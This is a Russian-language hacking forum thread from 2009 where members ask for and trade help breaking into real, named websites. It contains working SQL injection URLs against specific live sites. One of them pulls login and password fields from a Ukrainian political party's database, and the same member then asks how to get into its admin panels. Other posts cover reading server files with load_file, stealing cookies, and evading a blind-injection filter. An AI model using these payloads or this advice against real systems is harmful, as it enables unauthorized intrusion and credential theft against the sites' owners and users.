Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kote_otake

    kote_otake New Member

    Joined:
    15 Oct 2009
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Я конечно, ламер, но можно вопрос?
    Если сайт не юзает XSS, то можно сташить куки через сниффер?
    Или это невозможно?
     
    1 person likes this.
  2. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    извени, но нет :(
     
  3. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    что то новое
     
    2 people like this.
  4. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    можно, но для этого нужо какимто образом заставить жертву ввести скрипт в адресную строку.
     
  5. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    http://armatula.ru/index.php?id=73'
    Раскручиваемо?
     
    1 person likes this.
  6. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    раскручиваемо:
    http://armatula.ru/index.php?id=-73'+union+select+version(),2,3+--+
     
    2 people like this.
  7. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    есть сайт http://danielbrowninc.com/story_preview.php
    вылазит ошибка /www/danielbrowninc.com/includes/functions.inc

    иду на http://danielbrowninc.com/includes/ или на http://danielbrowninc.com/includes/functions.inc
    вылазит 404 ошибка! как такое могет быть?
     
  8. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    не! физически файл существуеть! я его через load_file читаю

    Add: Пошел pelmeshk0 сканить
     
    #9288 Rubaka, 16 Oct 2009
    Last edited: 16 Oct 2009
  9. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    сайт может быть в папке html к примеру
    /www/danielbrowninc.com/html/
    поэтому доступа к папке инклудес нет из веба
     
  10. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    насканил:все защищено .htaccess-ами
    и их через лоад файл не прочитать ((((((((

    придеться шонить другое искать
     
    1 person likes this.
  11. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Возможно просто в твоём functions.inc проверка, если инклюд > Выполняем.
    Если не инклюд тупо.
    PHP:
    header("HTTP/1.0 404 Not Found") or die();
     
    1 person likes this.
  12. Rezak

    Rezak New Member

    Joined:
    25 Jan 2008
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Есть такой скрипт
    PHP:
    <?php
    session_start
    ();

    $template->set_filenames(array('head'=>"$template_path/header.html"));

    $template->pparse('head');

    ?>
    Реально череp параметры переопределить класс template, ну и заставить скрипт делать что-то свое?
     
  13. monolog

    monolog Banned

    Joined:
    15 Aug 2009
    Messages:
    7
    Likes Received:
    7
    Reputations:
    5
    нет
     
  14. Gray_Wolf

    Gray_Wolf Active Member

    Joined:
    7 Mar 2009
    Messages:
    377
    Likes Received:
    135
    Reputations:
    10
    Есть страница со слепой скулей.
    При вводе
    Code:
    ?id=1+AND+(SUBSTRING(version(),1,1 ))>33..127
    всё работает нормально.
    При вводе
    Code:
    ?id=1+AND+(SUBSTRING((select+login+from+users+limit+1,1),1,1 ))>33..127
    Тишина.(таблица и поля 100% называться так)
    Для проверки ввёл
    Code:
    ?id=1+AND+(SUBSTRING((select+select+version()),1,1 ))>33..127
    Всё вывелось.

    Т.е. в коде видимо идёт замена 'select' на '', для пробы попробовал selselectct, тоже не помогло(видимо проверка в цикле), можно тут что-то сделать?
     
    #9294 Gray_Wolf, 16 Oct 2009
    Last edited: 16 Oct 2009
    1 person likes this.
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Дать линк
     
  16. Gray_Wolf

    Gray_Wolf Active Member

    Joined:
    7 Mar 2009
    Messages:
    377
    Likes Received:
    135
    Reputations:
    10
    сайт недоступен из инета :(
     
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    WTF?
     
  18. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    Такая ситуация.
    Есть сайт одной украинской партии.
    Есть скуля по нему
    Code:
    http://www.prp.org.ua/index.php?mid=10&action=news_full&news_id=-1229%20union%20select%201,login,3,password,5,6,7,8,9,10,11,12,13%20FROM%20private%20--
    есть админка
    Code:
    http://www.prp.org.ua/phpmyadmin
    есть ещё конфиг к ней, но я не знаю что с ней делать
    Code:
    http://www.prp.org.ua/phpmyadmin/scripts/setup.php
    Вот ещё сдесь директ админ
    Code:
    http://www.prp.org.ua/config
    помогите...пароли не подходят, и что можно со всем этим сделать
     
  19. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    phpmyadmin это оболчка для работы с базами данных mysql, а не админка

    а вход на главной ))
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    TELO, ты достаешь данные не из конфига MySQL / DirectAdmin'a.
     
Thread Status:
Not open for further replies.